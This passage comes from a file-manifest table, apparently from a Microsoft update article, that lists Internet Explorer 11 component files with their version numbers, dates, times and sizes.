11.0.9600.19650| 11-Feb-2020| 5:16| 60,416 \nmsfeedssync.exe| 11.0.9600.17416| 30-Oct-2014| 22:08| 12,800 \nmshta.exe| 11.0.9600.17416| 30-Oct-2014| 22:12| 13,824 \nmshtmled.dll| 11.0.9600.20045| 4-Jun-2021| 21:55| 92,672 \nmshtml.dll| 11.0.9600.20112| 13-Aug-2021| 22:07| 25,759,232 \nmshtml.tlb| 11.0.9600.16518| 6-Feb-2014| 3:30| 2,724,864 \nMicrosoft-Windows-IE-HTMLRendering.ptxml| Not versioned| 5-Feb-2014| 21:41| 3,228 \nIEAdvpack.dll| 11.0.9600.17416| 30-Oct-2014| 21:54| 132,096 \nieetwcollector.exe| 11.0.9600.18895| 1-Jan-2018| 21:17| 116,224 \nieetwproxystub.dll| 11.0.9600.18895| 1-Jan-2018| 21:28| 48,640 \nieetwcollectorres.dll| 11.0.9600.16518| 6-Feb-2014| 3:30| 4,096 \nielowutil.exe| 11.0.9600.17416| 30-Oct-2014| 21:55| 222,720 \nieproxy.dll| 11.0.9600.20045| 4-Jun-2021| 21:13| 870,400 \nIEShims.dll| 11.0.9600.19650| 11-Feb-2020| 4:29| 387,072 \niexpress.exe| 11.0.9600.17416| 30-Oct-2014| 22:10| 167,424 \nwextract.exe| 11.0.9600.17416| 30-Oct-2014| 22:12| 143,872 \nimgutil.dll| 11.0.9600.19963| 12-Feb-2021| 18:08| 51,712 \nWindows Pop-up Blocked.wav| Not versioned| 23-Sep-2013| 20:25| 85,548 \nWindows Information Bar.wav| Not versioned| 23-Sep-2013| 20:25| 23,308 \nWindows Feed Discovered.wav| Not versioned| 23-Sep-2013| 20:25| 19,884 \nWindows Navigation Start.wav| Not versioned| 23-Sep-2013| 20:25| 11,340 \nbing.ico| Not versioned| 23-Sep-2013| 19:51| 5,430 \nieUnatt.exe| 11.0.9600.17416| 30-Oct-2014| 21:51| 144,384 \nMicrosoft-Windows-IE-InternetExplorer-ppdlic.xrm-ms| Not versioned| 13-Aug-2021| 22:36| 2,956 \njsdbgui.dll| 11.0.9600.19963| 12-Feb-2021| 18:43| 591,872 \njsprofilerui.dll| 11.0.9600.19963| 12-Feb-2021| 18:44| 628,736 \nMemoryAnalyzer.dll| 11.0.9600.19963| 12-Feb-2021| 19:01| 1,862,656 \nMshtmlDac.dll| 11.0.9600.19846| 23-Sep-2020| 21:25| 88,064 \nnetworkinspection.dll| 11.0.9600.19963| 12-Feb-2021| 18:38| 1,217,024 \noccache.dll| 11.0.9600.17416| 30-Oct-2014| 21:19| 152,064 \ndesktop.ini| Not versioned| 18-Jun-2013| 7:43| 65 \nwebcheck.dll| 11.0.9600.20045| 4-Jun-2021| 21:44| 262,144 \ndesktop.ini| Not versioned| 18-Jun-2013| 7:44| 65 \npdm.dll| 12.0.41202.0| 30-Sep-2014| 16:01| 579,192 \nmsdbg2.dll| 12.0.41202.0| 30-Sep-2014| 16:01| 403,592 \npdmproxy100.dll| 12.0.41202.0| 30-Sep-2014| 16:01| 107,152 \nmsrating.dll| 11.0.9600.18895| 1-Jan-2018| 20:56| 199,680 \nicrav03.rat| Not versioned| 23-Sep-2013| 19:32| 8,798 \nticrf.rat| Not versioned| 23-Sep-2013| 19:32| 1,988 \niertutil.dll| 11.0.9600.20064| 14-Jun-2021| 21:56| 2,916,864 \nie4uinit.exe| 11.0.9600.19963| 12-Feb-2021| 18:28| 728,064 \niernonce.dll| 11.0.9600.17416| 30-Oct-2014| 21:56| 34,304 \niesetup.dll| 11.0.9600.17416| 30-Oct-2014| 22:06| 66,560 \nieuinit.inf| Not versioned| 12-Mar-2015| 18:58| 16,303 \ninseng.dll| 11.0.9600.19101| 18-Jul-2018| 21:03| 107,520 \niesysprep.dll| 11.0.9600.17416| 30-Oct-2014| 21:29| 111,616 \nTimeline.dll| 11.0.9600.19963| 12-Feb-2021| 18:45| 219,648 \nTimeline_is.dll| 11.0.9600.19963| 12-Feb-2021| 19:07| 172,032 \nTimeline.cpu.xml| Not versioned| 24-Jul-2014| 11:58| 3,197 \nVGX.dll| 11.0.9600.19963| 12-Feb-2021| 18:43| 1,018,880 \nurl.dll| 11.0.9600.17416| 30-Oct-2014| 22:06| 237,568 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:14| 2,066,432 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:14| 2,121,216 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:14| 2,075,136 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:14| 2,063,872 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:14| 2,314,240 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:14| 2,390,528 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:14| 2,034,176 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 23:22| 2,033,152 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:13| 2,307,584 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:13| 2,255,872 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:14| 2,061,312 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:14| 2,326,016 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:14| 2,019,840 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:14| 2,071,040 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:14| 2,082,816 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:18| 2,307,584 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:17| 2,170,368 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:17| 2,153,984 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:15| 2,291,712 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:16| 2,283,520 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:17| 2,052,096 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:17| 2,301,952 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:18| 2,093,056 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:11| 2,075,648 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:10| 2,299,392 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:10| 2,094,592 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:12| 2,316,800 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:10| 2,305,536 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:11| 2,278,912 \nieframe.dll.mui| 11.0.9600.20112| 13-Aug-2021| 23:24| 2,286,080 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:11| 2,060,288 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:13| 2,315,776 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:13| 2,278,912 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:13| 2,324,992 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:13| 2,098,176 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:14| 1,890,304 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:14| 1,890,304 \nieframe.dll| 11.0.9600.20112| 13-Aug-2021| 19:52| 15,506,432 \nieframe.ptxml| Not versioned| 5-Feb-2014| 21:41| 24,486 \nieinstal.exe| 11.0.9600.18639| 25-Mar-2017| 10:20| 492,032 \nInetRes.adml| Not versioned| 12-Feb-2021| 22:00| 526,294 \nInetRes.adml| Not versioned| 12-Feb-2021| 22:00| 499,654 \nInetRes.adml| Not versioned| 12-Feb-2021| 21:59| 552,337 \nInetRes.adml| Not versioned| 12-Feb-2021| 22:01| 944,559 \nInetRes.adml| Not versioned| 12-Feb-2021| 21:14| 457,561 \nInetRes.adml| Not versioned| 12-Feb-2021| 22:00| 543,946 \nInetRes.adml| Not versioned| 12-Feb-2021| 22:01| 526,557 \nInetRes.adml| Not versioned| 12-Feb-2021| 21:59| 575,838 \nInetRes.adml| Not versioned| 12-Feb-2021| 22:01| 570,737 \nInetRes.adml| Not versioned| 12-Feb-2021| 21:56| 548,119 \nInetRes.adml| Not versioned| 12-Feb-2021| 21:56| 639,271 \nInetRes.adml| Not versioned| 12-Feb-2021| 21:57| 525,504 \nInetRes.adml| Not versioned| 12-Feb-2021| 21:56| 488,488 \nInetRes.adml| Not versioned| 12-Feb-2021| 21:56| 548,494 \nInetRes.adml| Not versioned| 12-Feb-2021| 21:56| 559,343 \nInetRes.adml| Not versioned| 12-Feb-2021| 22:02| 535,067 \nInetRes.adml| Not versioned| 12-Feb-2021| 22:02| 541,455 \nInetRes.adml| Not versioned| 12-Feb-2021| 22:03| 804,470 \nInetRes.adml| Not versioned| 12-Feb-2021| 22:00| 503,909 \nInetRes.adml| Not versioned| 12-Feb-2021| 22:02| 521,583 \nInetRes.adml| Not versioned| 12-Feb-2021| 22:02| 420,082 \nInetRes.adml| Not versioned| 12-Feb-2021| 21:59| 436,651 \nInetRes.adml| Not versioned| 12-Feb-2021| 21:59| 436,651 \ninetres.admx| Not versioned| 8-Feb-2021| 20:02| 1,678,023 \ninetcomm.dll| 6.3.9600.20112| 13-Aug-2021| 19:48| 1,033,216 \nINETRES.dll| 6.3.9600.16384| 22-Aug-2013| 4:43| 84,480 \njscript9.dll| 11.0.9600.20112| 13-Aug-2021| 20:47| 5,508,096 \njscript9diag.dll| 11.0.9600.19963| 12-Feb-2021| 19:03| 814,592 \njscript.dll| 5.8.9600.20112| 13-Aug-2021| 20:12| 785,408 \nvbscript.dll| 5.8.9600.20112| 13-Aug-2021| 20:22| 581,120 \niexplore.exe| 11.0.9600.19036| 24-May-2018| 22:24| 817,296 \nhtml.iec| 2019.0.0.18895| 1-Jan-2018| 20:51| 341,504 \nieui.dll| 11.0.9600.18895| 1-Jan-2018| 20:44| 476,160 \niepeers.dll| 11.0.9600.19963| 12-Feb-2021| 18:20| 128,512 \ntdc.ocx| 11.0.9600.19963| 12-Feb-2021| 18:24| 73,728 \ndxtmsft.dll| 11.0.9600.19963| 12-Feb-2021| 18:29| 415,744 \ndxtrans.dll| 11.0.9600.19963| 12-Feb-2021| 18:20| 280,064 \nmsfeeds.dll| 11.0.9600.20112| 13-Aug-2021| 19:35| 696,320 \nmsfeeds.mof| Not versioned| 5-Feb-2014| 21:53| 1,518 \nmshta.exe| 11.0.9600.17416| 30-Oct-2014| 20:28| 12,800 \nmshtmled.dll| 11.0.9600.19963| 12-Feb-2021| 18:21| 76,800 \nmshtml.dll| 11.0.9600.20112| 13-Aug-2021| 20:33| 20,294,144 \nmshtml.tlb| 11.0.9600.16518| 6-Feb-2014| 2:20| 2,724,864 \nwow64_Microsoft-Windows-IE-HTMLRendering.ptxml| Not versioned| 5-Feb-2014| 21:43| 3,228 \nieetwproxystub.dll| 11.0.9600.17416| 30-Oct-2014| 20:23| 47,616 \nieUnatt.exe| 11.0.9600.17416| 30-Oct-2014| 20:12| 115,712 \noccache.dll| 11.0.9600.17416| 30-Oct-2014| 19:48| 130,048 \nwebcheck.dll| 11.0.9600.19963| 12-Feb-2021| 18:13| 230,400 \niernonce.dll| 11.0.9600.17416| 30-Oct-2014| 20:15| 30,720 \niesetup.dll| 11.0.9600.17416| 30-Oct-2014| 20:24| 62,464 \nieuinit.inf| Not versioned| 12-Mar-2015| 18:55| 16,303 \niesysprep.dll| 11.0.9600.17416| 30-Oct-2014| 19:56| 90,624 \nieframe.dll| 11.0.9600.20112| 13-Aug-2021| 19:47| 13,881,856 \nie9props.propdesc| Not versioned| 23-Sep-2013| 19:34| 2,843 \nwow64_ieframe.ptxml| Not versioned| 5-Feb-2014| 21:43| 24,486 \njscript9.dll| 11.0.9600.20112| 13-Aug-2021| 19:52| 4,119,040 \njscript9diag.dll| 11.0.9600.19963| 12-Feb-2021| 18:37| 620,032 \njscript.dll| 5.8.9600.20112| 13-Aug-2021| 19:56| 653,824 \nvbscript.dll| 5.8.9600.20112| 13-Aug-2021| 20:04| 498,176 \nactxprxy.dll| 6.3.9600.20045| 4-Jun-2021| 21:32| 1,049,600 \nhlink.dll| 6.3.9600.19101| 18-Jul-2018| 20:55| 99,328 \npngfilt.dll| 11.0.9600.19963| 12-Feb-2021| 18:49| 58,368 \nurlmon.dll| 11.0.9600.20112| 13-Aug-2021| 19:19| 1,342,976 \nWininetPlugin.dll| 6.3.9600.17416| 30-Oct-2014| 20:12| 35,328 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:31| 46,592 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:30| 52,736 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:30| 51,200 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:30| 51,200 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:30| 56,320 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 57,856 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 49,664 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 11:17| 49,664 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 54,272 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 47,616 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 49,152 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:30| 55,296 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 45,056 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 51,712 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 51,712 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 53,248 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 39,424 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 35,840 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:31| 50,176 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:31| 51,200 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:31| 50,688 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:31| 52,736 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:31| 53,760 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:30| 54,272 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:29| 54,272 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:30| 52,736 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:29| 51,200 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:30| 53,248 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:30| 52,736 \nwininet.dll.mui| 11.0.9600.20112| 13-Aug-2021| 21:44| 51,712 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:30| 50,688 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:27| 50,688 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:28| 50,176 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:28| 50,176 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:28| 31,232 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:30| 31,232 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:30| 31,232 \ninetcpl.cpl| 11.0.9600.20045| 4-Jun-2021| 21:30| 2,058,752 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 307,200 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 293,888 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:52| 290,304 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 289,280 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 299,008 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 303,104 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:49| 282,112 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 20:58| 282,112 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:51| 296,960 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 283,648 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 291,840 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 299,520 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:51| 275,968 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:49| 290,816 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:49| 293,376 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:53| 296,960 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:53| 258,048 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:52| 256,512 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:51| 289,280 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:53| 288,256 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:53| 285,184 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:53| 295,424 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:52| 297,472 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 292,864 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:51| 295,424 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 294,400 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:51| 294,400 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 292,864 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 290,816 \nmshtml.dll.mui| 11.0.9600.20112| 13-Aug-2021| 21:45| 290,816 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 286,208 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:43| 281,600 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:43| 286,720 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:42| 292,352 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:43| 242,176 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:53| 243,200 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 243,200 \nJavaScriptCollectionAgent.dll| 11.0.9600.19963| 12-Feb-2021| 18:25| 60,416 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:26| 46,080 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:24| 50,176 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:23| 48,640 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:24| 49,664 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:23| 51,712 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:12| 54,272 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:12| 48,128 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 11:10| 48,128 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:12| 50,176 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:12| 47,616 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:12| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:24| 50,688 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:12| 45,056 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:12| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:13| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:07| 49,664 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:07| 39,936 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:07| 39,424 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:07| 47,616 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:07| 48,640 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:07| 51,200 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:07| 50,688 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:03| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:04| 50,176 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:02| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:03| 48,640 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:03| 49,664 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:03| 48,640 \nurlmon.dll.mui| 11.0.9600.20112| 13-Aug-2021| 21:46| 49,664 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:03| 48,640 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:04| 48,128 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:04| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:05| 48,128 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:04| 35,328 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:23| 35,328 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:23| 35,328 \nwininet.dll| 11.0.9600.20112| 13-Aug-2021| 19:27| 4,387,840 \njsproxy.dll| 11.0.9600.17416| 30-Oct-2014| 20:16| 47,104 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:12| 114,176 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:09| 130,560 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:10| 124,928 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:12| 122,880 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:10| 130,048 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:12| 138,240 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:12| 114,688 \ninetcpl.cpl.mui| 11.0.9600.18666| 16-Apr-2017| 1:51| 114,688 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:12| 131,584 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:10| 117,760 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:12| 122,368 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:12| 134,144 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:13| 107,008 \ninetcpl.cpl.mui| 11.0.9600.18838| 14-Oct-2017| 1:46| 123,392 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:11| 127,488 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:11| 128,512 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:07| 88,064 \ninetcpl.cpl.mui| 11.0.9600.18838| 14-Oct-2017| 1:47| 82,944 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:07| 125,440 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:07| 123,392 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:10| 120,320 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:07| 130,560 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:07| 129,024 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:26| 125,952 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:26| 129,024 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:25| 128,000 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:26| 123,904 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:26| 129,024 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 15:25| 123,904 \ninetcpl.cpl.mui| 11.0.9600.20112| 13-Aug-2021| 21:45| 124,416 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 13:56| 121,856 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:03| 115,712 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:04| 123,904 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:04| 125,440 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:04| 74,752 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:09| 75,776 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 14:10| 75,776 \niedkcs32.dll| 18.0.9600.20045| 4-Jun-2021| 21:34| 333,312 \ninstall.ins| Not versioned| 13-Aug-2021| 17:57| 464 \nieapfltr.dat| 10.0.9301.0| 23-Sep-2013| 19:20| 616,104 \nieapfltr.dll| 11.0.9600.20112| 13-Aug-2021| 19:16| 710,656 \nlicmgr10.dll| 11.0.9600.17416| 30-Oct-2014| 20:03| 27,136 \niedvtool.dll| 11.0.9600.20045| 4-Jun-2021| 22:45| 772,608 \nDiagnosticsTap.dll| 11.0.9600.19963| 12-Feb-2021| 18:28| 175,104 \nF12Tools.dll| 11.0.9600.19963| 12-Feb-2021| 18:27| 256,000 \nmsfeedsbs.mof| Not versioned| 21-Aug-2013| 16:49| 1,574 \nmsfeedsbs.dll| 11.0.9600.19650| 11-Feb-2020| 4:57| 52,736 \nmsfeedssync.exe| 11.0.9600.17416| 30-Oct-2014| 20:25| 11,264 \nIEAdvpack.dll| 11.0.9600.17416| 30-Oct-2014| 20:14| 112,128 \nielowutil.exe| 11.0.9600.19404| 9-Jul-2019| 20:06| 221,184 \nieproxy.dll| 11.0.9600.19963| 12-Feb-2021| 17:45| 310,784 \nIEShims.dll| 11.0.9600.20045| 4-Jun-2021| 21:12| 290,304 \niexpress.exe| 11.0.9600.17416| 30-Oct-2014| 20:27| 152,064 \nwextract.exe| 11.0.9600.17416| 30-Oct-2014| 20:28| 137,728 \nimgutil.dll| 11.0.9600.19963| 12-Feb-2021| 17:59| 40,448 \nExtExport.exe| 11.0.9600.17416| 30-Oct-2014| 20:20| 25,600 \njsdbgui.dll| 11.0.9600.19963| 12-Feb-2021| 18:22| 459,776 \njsprofilerui.dll| 11.0.9600.19963| 12-Feb-2021| 18:22| 579,584 \nMshtmlDac.dll| 11.0.9600.19867| 12-Oct-2020| 21:43| 64,000 \nnetworkinspection.dll| 11.0.9600.19846| 23-Sep-2020| 20:28| 1,075,200 \npdm.dll| 12.0.41202.0| 30-Sep-2014| 16:00| 442,992 \nmsdbg2.dll| 12.0.41202.0| 30-Sep-2014| 16:00| 315,008 \npdmproxy100.dll| 12.0.41202.0| 30-Sep-2014| 16:00| 99,984 \nmsrating.dll| 11.0.9600.19507| 5-Oct-2019| 19:57| 168,960 \nicrav03.rat| Not versioned| 23-Sep-2013| 19:25| 8,798 \nticrf.rat| Not versioned| 23-Sep-2013| 19:26| 1,988 \niertutil.dll| 11.0.9600.20064| 14-Jun-2021| 21:16| 2,308,608 \ninseng.dll| 11.0.9600.17416| 30-Oct-2014| 19:56| 91,136 \nVGX.dll| 11.0.9600.19963| 12-Feb-2021| 18:21| 818,176 \nurl.dll| 11.0.9600.17416| 30-Oct-2014| 20:24| 235,520 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:27| 2,066,432 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:26| 2,121,216 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:26| 2,075,136 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:27| 2,063,872 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:26| 2,314,240 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:29| 2,390,528 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:29| 2,034,176 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 21:39| 2,033,152 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:29| 2,307,584 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:29| 2,255,872 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 22:30| 2,061,312 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 